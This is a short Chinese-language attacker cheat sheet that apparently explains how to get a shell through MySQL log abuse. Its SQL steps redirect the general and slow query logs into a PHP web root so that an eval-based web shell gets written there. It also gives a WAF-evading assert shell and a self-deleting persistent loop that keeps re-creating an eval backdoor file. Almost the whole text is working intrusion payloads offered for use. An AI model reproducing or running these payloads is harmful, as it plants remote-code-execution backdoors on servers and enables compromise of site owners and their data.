MySql慢查询日志GetShell

先看是不是root

1、先看可不可以直接写入

SHOW VARIABLES LIKE  "secure_file_priv"

2、利用log变量，找绝对路径

SHOW VARIABLES LIKE "general%";

D:\phpStudy\MySQL\data\XS103811951.log

SET global general_log_file='D:/phpStudy/www/13.php';

set global general_log = "ON";

select '<?php eval($_POST[cmd]);?>';

set global general_log = "OFF";

过狗

<?php

function kdog($a){

    assert($a);

}

kdog($_POST[x]);

?>

不死

<?php

set_time_limit(0);

ignore_user_abort(1);

unlink(__FILE__);

while(1){file_put_contents('ma.php','<?php $a=array($_REQUEST["xx123"]=>"3");

$b=array_keys($a)[0];eval($b);?>');sleep(8);}

?>

网站路径

DOCUMENT_ROOT     D:/UPUPW_AP5.4-1510/UPUPW_AP5.4/htdocs

SET global general_log_file='D:/UPUPW_AP5.4-1510/UPUPW_AP5.4/htdocs/1.php';

set global general_log = "ON";

select '<?php eval($_POST[pass]);?>';

set global general_log = "OFF";

SHOW VARIABLES LIKE "secure_file_priv";

SHOW VARIABLES LIKE "general%";

D:\phpStudy\PHPTutorial\MySQL\data\DESKTOP-DMACCJ...

D:/phpStudy/PHPTutorial/WWW/

慢日志

show variables like '%slow%';

Variable_name Value

log_slow_queries OFF

slow_launch_time 2

slow_query_log OFF

slow_query_log_file C:\phpStudy\PHPTutorial\MySQL\data\WIN-3743454-slow.log

set GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/slow.php';

set GLOBAL slow_query_log=on;

/*set GLOBAL log_queries_not_using_indexes=on;

show variables like '%log%';*/

select '<?php phpinfo();?>' from mysql.db where sleep(10);